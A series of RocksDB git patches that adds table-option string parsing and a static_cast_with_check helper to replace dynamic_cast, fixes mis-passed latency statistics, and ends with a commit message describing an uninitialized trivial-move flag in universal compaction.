const BlockBasedTableFactory* file_tf, + OptionsSanityCheckLevel sanity_check_level); + +static std::unordered_map + block_based_table_type_info = { + /* currently not supported + std::shared_ptr block_cache = nullptr; + std::shared_ptr block_cache_compressed = nullptr; + */ + {"flush_block_policy_factory", + {offsetof(struct BlockBasedTableOptions, flush_block_policy_factory), + OptionType::kFlushBlockPolicyFactory, OptionVerificationType::kByName, + false, 0}}, + {"cache_index_and_filter_blocks", + {offsetof(struct BlockBasedTableOptions, + cache_index_and_filter_blocks), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, + {"cache_index_and_filter_blocks_with_high_priority", + {offsetof(struct BlockBasedTableOptions, + cache_index_and_filter_blocks_with_high_priority), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, + {"pin_l0_filter_and_index_blocks_in_cache", + {offsetof(struct BlockBasedTableOptions, + pin_l0_filter_and_index_blocks_in_cache), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, + {"index_type", + {offsetof(struct BlockBasedTableOptions, index_type), + OptionType::kBlockBasedTableIndexType, + OptionVerificationType::kNormal, false, 0}}, + {"hash_index_allow_collision", + {offsetof(struct BlockBasedTableOptions, hash_index_allow_collision), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, + {"checksum", + {offsetof(struct BlockBasedTableOptions, checksum), + OptionType::kChecksumType, OptionVerificationType::kNormal, false, + 0}}, + {"no_block_cache", + {offsetof(struct BlockBasedTableOptions, no_block_cache), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, + {"block_size", + {offsetof(struct BlockBasedTableOptions, block_size), + OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}}, + {"block_size_deviation", + {offsetof(struct BlockBasedTableOptions, block_size_deviation), + OptionType::kInt, OptionVerificationType::kNormal, false, 0}}, + {"block_restart_interval", + {offsetof(struct BlockBasedTableOptions, block_restart_interval), + OptionType::kInt, OptionVerificationType::kNormal, false, 0}}, + {"index_block_restart_interval", + {offsetof(struct BlockBasedTableOptions, index_block_restart_interval), + OptionType::kInt, OptionVerificationType::kNormal, false, 0}}, + {"index_per_partition", + {0, OptionType::kUInt64T, OptionVerificationType::kDeprecated, false, + 0}}, + {"metadata_block_size", + {offsetof(struct BlockBasedTableOptions, metadata_block_size), + OptionType::kUInt64T, OptionVerificationType::kNormal, false, 0}}, + {"partition_filters", + {offsetof(struct BlockBasedTableOptions, partition_filters), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, + {"filter_policy", + {offsetof(struct BlockBasedTableOptions, filter_policy), + OptionType::kFilterPolicy, OptionVerificationType::kByName, false, + 0}}, + {"whole_key_filtering", + {offsetof(struct BlockBasedTableOptions, whole_key_filtering), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, + {"skip_table_builder_flush", + {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, false, + 0}}, + {"format_version", + {offsetof(struct BlockBasedTableOptions, format_version), + OptionType::kUInt32T, OptionVerificationType::kNormal, false, 0}}, + {"verify_compression", + {offsetof(struct BlockBasedTableOptions, verify_compression), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, + {"read_amp_bytes_per_bit", + {offsetof(struct 
BlockBasedTableOptions, read_amp_bytes_per_bit), + OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}}}; +#endif // !ROCKSDB_LITE } // namespace rocksdb diff --git a/table/cuckoo_table_factory.h b/table/cuckoo_table_factory.h index 774dc3c3e80..db860c3d002 100644 --- a/table/cuckoo_table_factory.h +++ b/table/cuckoo_table_factory.h @@ -76,6 +76,11 @@ class CuckooTableFactory : public TableFactory { void* GetOptions() override { return &table_options_; } + Status GetOptionString(std::string* opt_string, + const std::string& delimiter) const override { + return Status::OK(); + } + private: CuckooTableOptions table_options_; }; diff --git a/table/plain_table_factory.cc b/table/plain_table_factory.cc index eadc2c0995f..5f7809b967d 100644 --- a/table/plain_table_factory.cc +++ b/table/plain_table_factory.cc @@ -5,12 +5,15 @@ #ifndef ROCKSDB_LITE #include "table/plain_table_factory.h" -#include #include +#include #include "db/dbformat.h" +#include "options/options_helper.h" +#include "port/port.h" +#include "rocksdb/convenience.h" #include "table/plain_table_builder.h" #include "table/plain_table_reader.h" -#include "port/port.h" +#include "util/string_util.h" namespace rocksdb { @@ -81,6 +84,143 @@ const PlainTableOptions& PlainTableFactory::table_options() const { return table_options_; } +Status GetPlainTableOptionsFromString(const PlainTableOptions& table_options, + const std::string& opts_str, + PlainTableOptions* new_table_options) { + std::unordered_map opts_map; + Status s = StringToMap(opts_str, &opts_map); + if (!s.ok()) { + return s; + } + return GetPlainTableOptionsFromMap(table_options, opts_map, + new_table_options); +} + +Status GetMemTableRepFactoryFromString( + const std::string& opts_str, + std::unique_ptr* new_mem_factory) { + std::vector opts_list = StringSplit(opts_str, ':'); + size_t len = opts_list.size(); + + if (opts_list.size() <= 0 || opts_list.size() > 2) { + return Status::InvalidArgument("Can't parse memtable_factory option ", + opts_str); + } + + MemTableRepFactory* mem_factory = nullptr; + + if (opts_list[0] == "skip_list") { + // Expecting format + // skip_list: + if (2 == len) { + size_t lookahead = ParseSizeT(opts_list[1]); + mem_factory = new SkipListFactory(lookahead); + } else if (1 == len) { + mem_factory = new SkipListFactory(); + } + } else if (opts_list[0] == "prefix_hash") { + // Expecting format + // prfix_hash: + if (2 == len) { + size_t hash_bucket_count = ParseSizeT(opts_list[1]); + mem_factory = NewHashSkipListRepFactory(hash_bucket_count); + } else if (1 == len) { + mem_factory = NewHashSkipListRepFactory(); + } + } else if (opts_list[0] == "hash_linkedlist") { + // Expecting format + // hash_linkedlist: + if (2 == len) { + size_t hash_bucket_count = ParseSizeT(opts_list[1]); + mem_factory = NewHashLinkListRepFactory(hash_bucket_count); + } else if (1 == len) { + mem_factory = NewHashLinkListRepFactory(); + } + } else if (opts_list[0] == "vector") { + // Expecting format + // vector: + if (2 == len) { + size_t count = ParseSizeT(opts_list[1]); + mem_factory = new VectorRepFactory(count); + } else if (1 == len) { + mem_factory = new VectorRepFactory(); + } + } else if (opts_list[0] == "cuckoo") { + // Expecting format + // cuckoo: + if (2 == len) { + size_t write_buffer_size = ParseSizeT(opts_list[1]); + mem_factory = NewHashCuckooRepFactory(write_buffer_size); + } else if (1 == len) { + return Status::InvalidArgument("Can't parse memtable_factory option ", + opts_str); + } + } else { + return Status::InvalidArgument("Unrecognized 
memtable_factory option ", + opts_str); + } + + if (mem_factory != nullptr) { + new_mem_factory->reset(mem_factory); + } + + return Status::OK(); +} + +std::string ParsePlainTableOptions(const std::string& name, + const std::string& org_value, + PlainTableOptions* new_options, + bool input_strings_escaped = false, + bool ignore_unknown_options = false) { + const std::string& value = + input_strings_escaped ? UnescapeOptionString(org_value) : org_value; + const auto iter = plain_table_type_info.find(name); + if (iter == plain_table_type_info.end()) { + if (ignore_unknown_options) { + return ""; + } else { + return "Unrecognized option"; + } + } + const auto& opt_info = iter->second; + if (opt_info.verification != OptionVerificationType::kDeprecated && + !ParseOptionHelper(reinterpret_cast<char*>(new_options) + opt_info.offset, + opt_info.type, value)) { + return "Invalid value"; + } + return ""; +} + +Status GetPlainTableOptionsFromMap( + const PlainTableOptions& table_options, + const std::unordered_map<std::string, std::string>& opts_map, + PlainTableOptions* new_table_options, bool input_strings_escaped, + bool ignore_unknown_options) { + assert(new_table_options); + *new_table_options = table_options; + for (const auto& o : opts_map) { + auto error_message = ParsePlainTableOptions( + o.first, o.second, new_table_options, input_strings_escaped); + if (error_message != "") { + const auto iter = plain_table_type_info.find(o.first); + if (iter == plain_table_type_info.end() || + !input_strings_escaped || // !input_strings_escaped indicates + // the old API, where everything is + // parsable. + (iter->second.verification != OptionVerificationType::kByName && + iter->second.verification != + OptionVerificationType::kByNameAllowNull && + iter->second.verification != OptionVerificationType::kDeprecated)) { + // Restore "new_options" to the default "base_options".
+ *new_table_options = table_options; + return Status::InvalidArgument("Can't parse PlainTableOptions:", + o.first + " " + error_message); + } + } + } + return Status::OK(); +} + extern TableFactory* NewPlainTableFactory(const PlainTableOptions& options) { return new PlainTableFactory(options); } diff --git a/table/plain_table_factory.h b/table/plain_table_factory.h index 33cd3134719..6c9ca44f30e 100644 --- a/table/plain_table_factory.h +++ b/table/plain_table_factory.h @@ -9,6 +9,7 @@ #include #include +#include "options/options_helper.h" #include "rocksdb/options.h" #include "rocksdb/table.h" @@ -170,9 +171,40 @@ class PlainTableFactory : public TableFactory { void* GetOptions() override { return &table_options_; } + Status GetOptionString(std::string* opt_string, + const std::string& delimiter) const override { + return Status::OK(); + } + private: PlainTableOptions table_options_; }; +static std::unordered_map<std::string, OptionTypeInfo> plain_table_type_info = { + {"user_key_len", + {offsetof(struct PlainTableOptions, user_key_len), OptionType::kUInt32T, + OptionVerificationType::kNormal, false, 0}}, + {"bloom_bits_per_key", + {offsetof(struct PlainTableOptions, bloom_bits_per_key), OptionType::kInt, + OptionVerificationType::kNormal, false, 0}}, + {"hash_table_ratio", + {offsetof(struct PlainTableOptions, hash_table_ratio), OptionType::kDouble, + OptionVerificationType::kNormal, false, 0}}, + {"index_sparseness", + {offsetof(struct PlainTableOptions, index_sparseness), OptionType::kSizeT, + OptionVerificationType::kNormal, false, 0}}, + {"huge_page_tlb_size", + {offsetof(struct PlainTableOptions, huge_page_tlb_size), + OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}}, + {"encoding_type", + {offsetof(struct PlainTableOptions, encoding_type), + OptionType::kEncodingType, OptionVerificationType::kByName, false, 0}}, + {"full_scan_mode", + {offsetof(struct PlainTableOptions, full_scan_mode), OptionType::kBoolean, + OptionVerificationType::kNormal, false, 0}}, + {"store_index_in_file", + {offsetof(struct PlainTableOptions, store_index_in_file), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}}; + } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc index d10758f04ab..a1c6af0290d 100644 --- a/tools/db_bench_tool.cc +++ b/tools/db_bench_tool.cc @@ -28,6 +28,7 @@ #include #include #include +#include #include #include #include @@ -57,6 +58,7 @@ #include "rocksdb/utilities/transaction.h" #include "rocksdb/utilities/transaction_db.h" #include "rocksdb/write_batch.h" +#include "util/cast_util.h" #include "util/compression.h" #include "util/crc32c.h" #include "util/mutexlock.h" @@ -2551,7 +2553,9 @@ void VerifyDBFromDB(std::string& truth_db_name) { } if (FLAGS_simcache_size >= 0) { fprintf(stdout, "SIMULATOR CACHE STATISTICS:\n%s\n", - std::dynamic_pointer_cast<SimCache>(cache_)->ToString().c_str()); + static_cast_with_check<SimCache, Cache>(cache_.get()) + ->ToString() + .c_str()); } } diff --git a/tools/ldb_cmd.cc b/tools/ldb_cmd.cc index 2cd4d94d112..c8b6221a570 100644 --- a/tools/ldb_cmd.cc +++ b/tools/ldb_cmd.cc @@ -29,6 +29,7 @@ #include "table/scoped_arena_iterator.h" #include "tools/ldb_cmd_impl.h" #include "tools/sst_dump_tool_imp.h" +#include "util/cast_util.h" #include "util/coding.h" #include "util/filename.h" #include "util/stderr_logger.h" @@ -1493,8 +1494,7 @@ void DBDumperCommand::DoDumpCommand() { if (max_keys == 0) break; if (is_db_ttl_) { - TtlIterator* it_ttl = dynamic_cast<TtlIterator*>(iter); - assert(it_ttl); + TtlIterator* it_ttl =
static_cast_with_check<TtlIterator, Iterator>(iter); rawtime = it_ttl->timestamp(); if (rawtime < ttl_start || rawtime >= ttl_end) { continue; @@ -2291,8 +2291,7 @@ void ScanCommand::DoCommand() { it->Valid() && (!end_key_specified_ || it->key().ToString() < end_key_); it->Next()) { if (is_db_ttl_) { - TtlIterator* it_ttl = dynamic_cast<TtlIterator*>(it); - assert(it_ttl); + TtlIterator* it_ttl = static_cast_with_check<TtlIterator, Iterator>(it); int rawtime = it_ttl->timestamp(); if (rawtime < ttl_start || rawtime >= ttl_end) { continue; diff --git a/tools/sst_dump_tool.cc b/tools/sst_dump_tool.cc index 2a1729c7651..07f34861233 100644 --- a/tools/sst_dump_tool.cc +++ b/tools/sst_dump_tool.cc @@ -14,6 +14,7 @@ #include #include #include +#include #include #include @@ -42,8 +43,6 @@ namespace rocksdb { -using std::dynamic_pointer_cast; - SstFileReader::SstFileReader(const std::string& file_path, bool verify_checksum, bool output_hex) @@ -115,18 +114,13 @@ Status SstFileReader::NewTableReader( unique_ptr<TableReader>* table_reader) { // We need to turn off pre-fetching of index and filter nodes for // BlockBasedTable - shared_ptr<BlockBasedTableFactory> block_table_factory = - dynamic_pointer_cast<BlockBasedTableFactory>(options_.table_factory); - - if (block_table_factory) { - return block_table_factory->NewTableReader( + if (BlockBasedTableFactory::kName == options_.table_factory->Name()) { + return options_.table_factory->NewTableReader( TableReaderOptions(ioptions_, soptions_, internal_comparator_, /*skip_filters=*/false), std::move(file_), file_size, &table_reader_, /*enable_prefetch=*/false); } - assert(!block_table_factory); - // For all other factory implementation return options_.table_factory->NewTableReader( TableReaderOptions(ioptions_, soptions_, internal_comparator_), diff --git a/util/cast_util.h b/util/cast_util.h new file mode 100644 index 00000000000..b42d5d6c4a9 --- /dev/null +++ b/util/cast_util.h @@ -0,0 +1,19 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). + +namespace rocksdb { +// The helper function to assert the move from dynamic_cast<> to +// static_cast<> is correct. This function is to deal with legacy code. +// It is not recommended to add new code to issue class casting. The preferred +// solution is to implement the functionality without a need of casting.
+template <class DestClass, class SrcClass> +inline DestClass* static_cast_with_check(SrcClass* x) { + DestClass* ret = static_cast<DestClass*>(x); +#ifdef ROCKSDB_USE_RTTI + assert(ret == dynamic_cast<DestClass*>(x)); +#endif + return ret; +} +} // namespace rocksdb diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 95deda5b0cc..f55566fd425 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -23,6 +23,7 @@ #include "table/block_based_table_builder.h" #include "table/block_builder.h" #include "table/meta_blocks.h" +#include "util/cast_util.h" #include "util/crc32c.h" #include "util/file_reader_writer.h" #include "util/filename.h" @@ -199,7 +200,8 @@ BlobDBImpl::BlobDBImpl(const std::string& dbname, open_p1_done_(false), debug_level_(0) { const BlobDBOptionsImpl* options_impl = - dynamic_cast<const BlobDBOptionsImpl*>(&blob_db_options); + static_cast_with_check<const BlobDBOptionsImpl, const BlobDBOptions>( + &blob_db_options); if (options_impl) { bdb_options_ = *options_impl; } @@ -215,12 +217,7 @@ Status BlobDBImpl::LinkToBaseDB(DB* db) { db_ = db; // the Base DB in-itself can be a stackable DB - StackableDB* sdb = dynamic_cast<StackableDB*>(db_); - if (sdb) { - db_impl_ = dynamic_cast<DBImpl*>(sdb->GetBaseDB()); - } else { - db_impl_ = dynamic_cast<DBImpl*>(db); - } + db_impl_ = static_cast_with_check<DBImpl, DB>(db_->GetRootDB()); env_ = db_->GetEnv(); @@ -249,7 +246,7 @@ BlobDBOptions BlobDBImpl::GetBlobDBOptions() const { return bdb_options_; } BlobDBImpl::BlobDBImpl(DB* db, const BlobDBOptions& blob_db_options) : BlobDB(db), - db_impl_(dynamic_cast<DBImpl*>(db)), + db_impl_(static_cast_with_check<DBImpl, DB>(db)), opt_db_(new OptimisticTransactionDBImpl(db, false)), wo_set_(false), bdb_options_(blob_db_options), @@ -268,10 +265,9 @@ BlobDBImpl::BlobDBImpl(DB* db, const BlobDBOptions& blob_db_options) total_blob_space_(0) { assert(db_impl_ != nullptr); const BlobDBOptionsImpl* options_impl = - dynamic_cast<const BlobDBOptionsImpl*>(&blob_db_options); - if (options_impl) { - bdb_options_ = *options_impl; - } + static_cast_with_check<const BlobDBOptionsImpl, const BlobDBOptions>( + &blob_db_options); + bdb_options_ = *options_impl; if (!bdb_options_.blob_dir.empty()) blob_dir_ = (bdb_options_.path_relative) @@ -1752,8 +1748,8 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr<BlobFile>& bfptr, gcstats->deleted_size += record.GetBlobSize(); if (first_gc) continue; - Transaction* txn = static_cast<OptimisticTransactionDB*>(opt_db_.get()) - ->BeginTransaction(write_options_); + Transaction* txn = opt_db_->BeginTransaction( + write_options_, OptimisticTransactionOptions(), nullptr); txn->Delete(cfh, record.Key()); Status s1 = txn->Commit(); // chances that this DELETE will fail is low. If it fails, it would be @@ -1817,8 +1813,8 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr<BlobFile>& bfptr, newfile->file_size_ += BlobLogRecord::kHeaderSize + record.Key().size() + record.Blob().size() + BlobLogRecord::kFooterSize; - Transaction* txn = static_cast<OptimisticTransactionDB*>(opt_db_.get()) - ->BeginTransaction(write_options_); + Transaction* txn = opt_db_->BeginTransaction( + write_options_, OptimisticTransactionOptions(), nullptr); txn->Put(cfh, record.Key(), index_entry); Status s1 = txn->Commit(); // chances that this Put will fail is low.
If it fails, it would be because diff --git a/utilities/column_aware_encoding_util.cc b/utilities/column_aware_encoding_util.cc index a77d38d1df9..c36e422549d 100644 --- a/utilities/column_aware_encoding_util.cc +++ b/utilities/column_aware_encoding_util.cc @@ -51,11 +51,9 @@ void ColumnAwareEncodingReader::InitTableReader(const std::string& file_path) { options_.comparator = &internal_comparator_; options_.table_factory = std::make_shared<BlockBasedTableFactory>(); - shared_ptr<BlockBasedTableFactory> block_table_factory = - std::dynamic_pointer_cast<BlockBasedTableFactory>(options_.table_factory); std::unique_ptr<TableReader> table_reader; - block_table_factory->NewTableReader( + options_.table_factory->NewTableReader( TableReaderOptions(ioptions_, soptions_, internal_comparator_, /*skip_filters=*/false), std::move(file_), file_size, &table_reader, /*enable_prefetch=*/false); diff --git a/utilities/options/options_util_test.cc b/utilities/options/options_util_test.cc index 86b382cfab5..2ca8d476721 100644 --- a/utilities/options/options_util_test.cc +++ b/utilities/options/options_util_test.cc @@ -100,28 +100,34 @@ class DummyTableFactory : public TableFactory { DummyTableFactory() {} virtual ~DummyTableFactory() {} - virtual const char* Name() const { return "DummyTableFactory"; } + virtual const char* Name() const override { return "DummyTableFactory"; } - virtual Status NewTableReader(const TableReaderOptions& table_reader_options, - unique_ptr<RandomAccessFileReader>&& file, - uint64_t file_size, - unique_ptr<TableReader>* table_reader, - bool prefetch_index_and_filter_in_cache) const { + virtual Status NewTableReader( + const TableReaderOptions& table_reader_options, + unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size, + unique_ptr<TableReader>* table_reader, + bool prefetch_index_and_filter_in_cache) const override { return Status::NotSupported(); } virtual TableBuilder* NewTableBuilder( const TableBuilderOptions& table_builder_options, - uint32_t column_family_id, WritableFileWriter* file) const { + uint32_t column_family_id, WritableFileWriter* file) const override { return nullptr; } - virtual Status SanitizeOptions(const DBOptions& db_opts, - const ColumnFamilyOptions& cf_opts) const { + virtual Status SanitizeOptions( + const DBOptions& db_opts, + const ColumnFamilyOptions& cf_opts) const override { return Status::NotSupported(); } - virtual std::string GetPrintableTableOptions() const { return ""; } + virtual std::string GetPrintableTableOptions() const override { return ""; } + + Status GetOptionString(std::string* opt_string, + const std::string& delimiter) const override { + return Status::OK(); + } }; class DummyMergeOperator : public MergeOperator { diff --git a/utilities/transactions/optimistic_transaction_impl.cc b/utilities/transactions/optimistic_transaction_impl.cc index 5652189bc35..044dded2365 100644 --- a/utilities/transactions/optimistic_transaction_impl.cc +++ b/utilities/transactions/optimistic_transaction_impl.cc @@ -17,6 +17,7 @@ #include "rocksdb/db.h" #include "rocksdb/status.h" #include "rocksdb/utilities/optimistic_transaction_db.h" +#include "util/cast_util.h" #include "util/string_util.h" #include "utilities/transactions/transaction_util.h" @@ -62,13 +63,7 @@ Status OptimisticTransactionImpl::Commit() { // check whether this transaction is safe to be committed. OptimisticTransactionCallback callback(this); - DBImpl* db_impl = dynamic_cast<DBImpl*>(db_->GetRootDB()); - if (db_impl == nullptr) { - // This should only happen if we support creating transactions from - // a StackableDB and someone overrides GetRootDB().
- return Status::InvalidArgument( - "DB::GetRootDB() returned an unexpected DB class"); - } + DBImpl* db_impl = static_cast_with_check<DBImpl, DB>(db_->GetRootDB()); Status s = db_impl->WriteWithCallback( write_options_, GetWriteBatch()->GetWriteBatch(), &callback); @@ -122,8 +117,7 @@ Status OptimisticTransactionImpl::TryLock(ColumnFamilyHandle* column_family, Status OptimisticTransactionImpl::CheckTransactionForConflicts(DB* db) { Status result; - assert(dynamic_cast<DBImpl*>(db) != nullptr); - auto db_impl = reinterpret_cast<DBImpl*>(db); + auto db_impl = static_cast_with_check<DBImpl, DB>(db); // Since we are on the write thread and do not want to block other writers, // we will do a cache-only conflict check. This can result in TryAgain diff --git a/utilities/transactions/transaction_db_impl.cc b/utilities/transactions/transaction_db_impl.cc index 2c425dd8d66..69b5bc1ea0f 100644 --- a/utilities/transactions/transaction_db_impl.cc +++ b/utilities/transactions/transaction_db_impl.cc @@ -15,6 +15,7 @@ #include "rocksdb/db.h" #include "rocksdb/options.h" #include "rocksdb/utilities/transaction_db.h" +#include "util/cast_util.h" #include "utilities/transactions/transaction_db_mutex_impl.h" #include "utilities/transactions/transaction_impl.h" @@ -23,7 +24,7 @@ namespace rocksdb { TransactionDBImpl::TransactionDBImpl(DB* db, const TransactionDBOptions& txn_db_options) : TransactionDB(db), - db_impl_(dynamic_cast<DBImpl*>(db)), + db_impl_(static_cast_with_check<DBImpl, DB>(db)), txn_db_options_(txn_db_options), lock_mgr_(this, txn_db_options_.num_stripes, txn_db_options.max_num_locks, txn_db_options_.custom_mutex_factory @@ -52,7 +53,7 @@ TransactionDBImpl::TransactionDBImpl(StackableDB* db, const TransactionDBOptions& txn_db_options) : TransactionDB(db), - db_impl_(dynamic_cast<DBImpl*>(db->GetRootDB())), + db_impl_(static_cast_with_check<DBImpl, DB>(db->GetRootDB())), txn_db_options_(txn_db_options), lock_mgr_(this, txn_db_options_.num_stripes, txn_db_options.max_num_locks, txn_db_options_.custom_mutex_factory @@ -371,8 +372,7 @@ Status TransactionDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { Transaction* txn = BeginInternalTransaction(opts); txn->DisableIndexing(); - assert(dynamic_cast<TransactionImpl*>(txn) != nullptr); - auto txn_impl = reinterpret_cast<TransactionImpl*>(txn); + auto txn_impl = static_cast_with_check<TransactionImpl, Transaction>(txn); // Since commitBatch sorts the keys before locking, concurrent Write() // operations will not cause a deadlock.
@@ -412,8 +412,7 @@ bool TransactionDBImpl::TryStealingExpiredTransactionLocks( void TransactionDBImpl::ReinitializeTransaction( Transaction* txn, const WriteOptions& write_options, const TransactionOptions& txn_options) { - assert(dynamic_cast<TransactionImpl*>(txn) != nullptr); - auto txn_impl = reinterpret_cast<TransactionImpl*>(txn); + auto txn_impl = static_cast_with_check<TransactionImpl, Transaction>(txn); txn_impl->Reinitialize(this, write_options, txn_options); } diff --git a/utilities/transactions/transaction_impl.cc b/utilities/transactions/transaction_impl.cc index 408b15bcd3d..dd0c69be48b 100644 --- a/utilities/transactions/transaction_impl.cc +++ b/utilities/transactions/transaction_impl.cc @@ -19,6 +19,7 @@ #include "rocksdb/snapshot.h" #include "rocksdb/status.h" #include "rocksdb/utilities/transaction_db.h" +#include "util/cast_util.h" #include "util/string_util.h" #include "util/sync_point.h" #include "utilities/transactions/transaction_db_impl.h" @@ -46,10 +47,9 @@ TransactionImpl::TransactionImpl(TransactionDB* txn_db, lock_timeout_(0), deadlock_detect_(false), deadlock_detect_depth_(0) { - txn_db_impl_ = dynamic_cast<TransactionDBImpl*>(txn_db); - assert(txn_db_impl_); - db_impl_ = dynamic_cast<DBImpl*>(txn_db->GetRootDB()); - assert(db_impl_); + txn_db_impl_ = + static_cast_with_check<TransactionDBImpl, TransactionDB>(txn_db); + db_impl_ = static_cast_with_check<DBImpl, DB>(txn_db->GetRootDB()); Initialize(txn_options); } @@ -526,8 +526,7 @@ Status TransactionImpl::ValidateSnapshot(ColumnFamilyHandle* column_family, *new_seqno = seq; - assert(dynamic_cast<DBImpl*>(db_) != nullptr); - auto db_impl = reinterpret_cast<DBImpl*>(db_); + auto db_impl = static_cast_with_check<DBImpl, DB>(db_); ColumnFamilyHandle* cfh = column_family ? column_family : db_impl->DefaultColumnFamily(); diff --git a/utilities/transactions/transaction_lock_mgr.cc b/utilities/transactions/transaction_lock_mgr.cc index a10aec17d7b..1184f667d81 100644 --- a/utilities/transactions/transaction_lock_mgr.cc +++ b/utilities/transactions/transaction_lock_mgr.cc @@ -22,6 +22,7 @@ #include "rocksdb/slice.h" #include "rocksdb/utilities/transaction_db_mutex.h" +#include "util/cast_util.h" #include "util/murmurhash.h" #include "util/sync_point.h" #include "util/thread_local.h" @@ -112,8 +113,9 @@ TransactionLockMgr::TransactionLockMgr( max_num_locks_(max_num_locks), lock_maps_cache_(new ThreadLocalPtr(&UnrefLockMapsCache)), mutex_factory_(mutex_factory) { - txn_db_impl_ = dynamic_cast<TransactionDBImpl*>(txn_db); - assert(txn_db_impl_); + assert(txn_db); + txn_db_impl_ = + static_cast_with_check<TransactionDBImpl, TransactionDB>(txn_db); } TransactionLockMgr::~TransactionLockMgr() {} From a84cee8127a0e9724b26e7d1d527f220c358c328 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Mon, 31 Jul 2017 12:00:02 -0700 Subject: [PATCH 063/205] Add a missing "once" in .h Summary: Closes https://github.com/facebook/rocksdb/pull/2670 Differential Revision: D5529018 Pulled By: siying fbshipit-source-id: 10a378933d509035d2dbe502247dd85fcea09789 --- util/cast_util.h | 2 ++ 1 file changed, 2 insertions(+) diff --git a/util/cast_util.h b/util/cast_util.h index b42d5d6c4a9..2dc8138ab3c 100644 --- a/util/cast_util.h +++ b/util/cast_util.h @@ -3,6 +3,8 @@ // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). +#pragma once + namespace rocksdb { // The helper function to assert the move from dynamic_cast<> to // static_cast<> is correct. This function is to deal with legacy code.
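For readers migrating their own call sites away from `dynamic_cast<>`, here is a minimal usage sketch of the helper introduced above. It is illustrative only and not part of these patches; `Base`, `Derived`, and `UseDerived` are hypothetical names.

```cpp
// Illustrative only -- hypothetical types, not from the patch series.
#include <cassert>
#include "util/cast_util.h"  // the header added by the patches above

class Base {
 public:
  virtual ~Base() {}
};

class Derived : public Base {
 public:
  int value = 42;
};

int UseDerived(Base* b) {
  // Before: Derived* d = dynamic_cast<Derived*>(b); assert(d != nullptr);
  // After:  a plain static_cast in non-RTTI builds; when ROCKSDB_USE_RTTI is
  // defined, the helper additionally asserts that dynamic_cast agrees.
  Derived* d = rocksdb::static_cast_with_check<Derived, Base>(b);
  return d->value;
}
```

This pattern only stays correct as long as the caller can guarantee the dynamic type, which is why the header's comment discourages adding new casts.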
From 6a36b3a7b9eba3766665aa66615ab59dece10e98 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Mon, 31 Jul 2017 12:07:42 -0700 Subject: [PATCH 064/205] fix db get/write stats Summary: we were passing `record_read_stats` (a bool) as the `hist_type` argument, which meant we were updating either `rocksdb.db.get.micros` (`hist_type == 0`) or `rocksdb.db.write.micros` (`hist_type == 1`) with wrong data. Closes https://github.com/facebook/rocksdb/pull/2666 Differential Revision: D5520384 Pulled By: ajkr fbshipit-source-id: 2f7c956aec32f8b58c5c18845ac478e0230c9516 --- HISTORY.md | 3 +++ db/table_cache.cc | 8 ++++---- 2 files changed, 7 insertions(+), 4 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 76e01f04c01..53ff4b9cf0b 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -4,6 +4,9 @@ * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. * Replace dynamic_cast<> (except unit test) so people can choose to build with RTTI off. With make, release mode is by default built with -fno-rtti and debug mode is built without it. Users can override it by setting USE_RTTI=0 or 1. +### Bug Fixes +* Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`. + ## 5.7.0 (07/13/2017) ### Public API Change * DB property "rocksdb.sstables" now prints keys in hex form. diff --git a/db/table_cache.cc b/db/table_cache.cc index a1a03d3bed7..b4d5cc1bb71 100644 --- a/db/table_cache.cc +++ b/db/table_cache.cc @@ -106,10 +106,10 @@ Status TableCache::GetTableReader( } StopWatch sw(ioptions_.env, ioptions_.statistics, TABLE_OPEN_IO_MICROS); std::unique_ptr<RandomAccessFileReader> file_reader( - new RandomAccessFileReader(std::move(file), fname, ioptions_.env, - ioptions_.statistics, record_read_stats, - file_read_hist, ioptions_.rate_limiter, - for_compaction)); + new RandomAccessFileReader( + std::move(file), fname, ioptions_.env, + record_read_stats ? ioptions_.statistics : nullptr, SST_READ_MICROS, + file_read_hist, ioptions_.rate_limiter, for_compaction)); s = ioptions_.table_factory->NewTableReader( TableReaderOptions(ioptions_, env_options, internal_comparator, skip_filters, level), From 3218edc573477a091058eebf565d57d6d1e25a93 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A5=8F=E4=B9=8B=E7=AB=A0?= Date: Mon, 31 Jul 2017 14:22:37 -0700 Subject: [PATCH 065/205] Fix universal compaction bug Summary: the member ``` Compaction::is_trivial_move_ ``` was left uninitialized. Under universal compaction we enable ``` CompactionOptionsUniversal::allow_trivial_move ``` (see https://github.com/facebook/rocksdb/blob/9b11d4345a0f01fc3de756e01460bf1b0446f326/db/compaction.cc#L245), so this was a disastrous bug: some SST files could be trivially moved to the target level without an overlap check, damaging the database and leaving a level with overlapping files!
